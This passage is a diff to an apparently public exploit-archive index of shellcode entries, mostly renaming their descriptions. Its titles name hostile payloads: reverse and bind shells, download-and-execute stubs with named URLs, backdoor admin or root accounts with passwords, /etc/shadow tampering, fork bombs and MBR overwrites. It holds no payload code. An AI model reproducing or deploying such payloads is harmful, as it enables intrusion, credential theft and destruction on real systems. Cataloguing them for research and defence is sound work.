bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 13491,platforms/generator/shellcode/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,generator,shellcode,0 13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 @@ -16031,30 +16030,30 @@ id,file,description,date,author,platform,type,port 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0 13505,platforms/win_x86/shellcode/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 -13507,platforms/win_x86/shellcode/13507.txt,"Windows x86 - SEH Omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 +13507,platforms/win_x86/shellcode/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 13508,platforms/win_x86/shellcode/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0 13509,platforms/win_x86/shellcode/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 -13510,platforms/win_x86/shellcode/13510.c,"Windows XP SP2 x86 (French) - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 +13510,platforms/win_x86/shellcode/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 13511,platforms/win_x86/shellcode/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 13512,platforms/win_x86/shellcode/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 13513,platforms/win_x86/shellcode/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 13514,platforms/win_x86/shellcode/13514.asm,"Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,win_x86,shellcode,0 13515,platforms/generator/shellcode/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",generator,shellcode,0 13516,platforms/win_x86/shellcode/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0 -13517,platforms/win_x86/shellcode/13517.asm,"Windows x86 - Download File + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 +13517,platforms/win_x86/shellcode/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 13518,platforms/win_x86/shellcode/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0 13519,platforms/win_x86/shellcode/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,win_x86,shellcode,0 -13520,platforms/win_x86/shellcode/13520.c,"Windows XP SP2 x86 - Pop up message box Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0 -13521,platforms/win_x86/shellcode/13521.asm,"Windows x86 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0 -13522,platforms/win_x86/shellcode/13522.c,"Windows x86 - Download File + Execute Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0 +13520,platforms/win_x86/shellcode/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0 +13521,platforms/win_x86/shellcode/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0 +13522,platforms/win_x86/shellcode/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0 13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0 13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0 13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0 13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0 -13528,platforms/generator/shellcode/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator)",2004-10-25,lion,generator,shellcode,0 -13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File + Execute Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 -13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 +13528,platforms/generator/shellcode/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)",2004-10-25,lion,generator,shellcode,0 +13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 +13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0 13533,platforms/win_x86-64/shellcode/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 @@ -16062,21 +16061,21 @@ id,file,description,date,author,platform,type,port 13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 -13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 -13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 +13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 +13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 13565,platforms/win_x86/shellcode/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0 -13569,platforms/win_x86/shellcode/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 +13569,platforms/win_x86/shellcode/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0 13571,platforms/win_x86/shellcode/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0 13572,platforms/lin_x86/shellcode/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode,0 13574,platforms/win_x86/shellcode/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode,0 13576,platforms/lin_x86/shellcode/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,lin_x86,shellcode,0 -13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot _..._) + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 -13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 +13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 +13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,lin_x86,shellcode,0 13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 -13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 +13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13582,platforms/windows/shellcode/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0 13595,platforms/win_x86/shellcode/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0 @@ -16088,7 +16087,7 @@ id,file,description,date,author,platform,type,port 13614,platforms/win_x86/shellcode/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 13615,platforms/win_x86/shellcode/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 13627,platforms/lin_x86/shellcode/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode,0 -13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0 +13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,lin_x86,shellcode,0 13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0 13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0 13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0 @@ -16096,28 +16095,28 @@ id,file,description,date,author,platform,type,port 13636,platforms/win_x86/shellcode/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0 13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0 13642,platforms/win_x86/shellcode/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0 -13645,platforms/windows/shellcode/13645.c,"Windows - JITed Egghunter Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0 +13645,platforms/windows/shellcode/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0 13647,platforms/win_x86/shellcode/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0 13648,platforms/win_x86/shellcode/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0 13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",windows,shellcode,0 13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0 13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 -13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0 -13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 -13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - SLoc-DoS Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 +13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0 +13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 +13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0 13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0 13679,platforms/generator/shellcode/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,generator,shellcode,0 13680,platforms/lin_x86/shellcode/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 -13681,platforms/lin_x86/shellcode/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 +13681,platforms/lin_x86/shellcode/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 13682,platforms/lin_x86/shellcode/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0 13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 -13691,platforms/lin_x86-64/shellcode/13691.c,"Linux/x86-64 - execve(_/bin/sh_); Shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 -13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - Sends _Phuck3d!_ To All Terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 +13691,platforms/lin_x86-64/shellcode/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 +13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0 -13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 (French) - Download File + Execute Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0 +13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0 13702,platforms/lin_x86/shellcode/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",lin_x86,shellcode,0 13703,platforms/lin_x86/shellcode/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 @@ -16127,7 +16126,7 @@ id,file,description,date,author,platform,type,port 13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0 13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0 -13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0 +13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0 13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0 13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 @@ -16140,7 +16139,7 @@ id,file,description,date,author,platform,type,port 13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 -13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 +13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0 13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 @@ -16158,14 +16157,14 @@ id,file,description,date,author,platform,type,port 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 -14218,platforms/linux/shellcode/14218.c,"Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14218,platforms/linux/shellcode/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0 14234,platforms/linux/shellcode/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14235,platforms/linux/shellcode/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14261,platforms/generator/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",generator,shellcode,0 14276,platforms/linux/shellcode/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 -14288,platforms/win_x86/shellcode/14288.asm,"Windows x86 - Write-to-file Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 +14288,platforms/win_x86/shellcode/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0 @@ -16179,23 +16178,23 @@ id,file,description,date,author,platform,type,port 15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15203,platforms/win_x86/shellcode/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15314,platforms/arm/shellcode/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15315,platforms/arm/shellcode/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15315,platforms/arm/shellcode/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15316,platforms/arm/shellcode/15316.asm,"ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15712,platforms/generator/shellcode/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",generator,shellcode,0 -15879,platforms/win_x86/shellcode/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking _You got pwned!_ Null-Free Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 +15879,platforms/win_x86/shellcode/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 16025,platforms/generator/shellcode/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,generator,shellcode,0 -16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 -16283,platforms/win_x86/shellcode/16283.txt,"Windows x86 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 +16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 +16283,platforms/win_x86/shellcode/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 17224,platforms/osx/shellcode/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17323,platforms/windows/shellcode/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 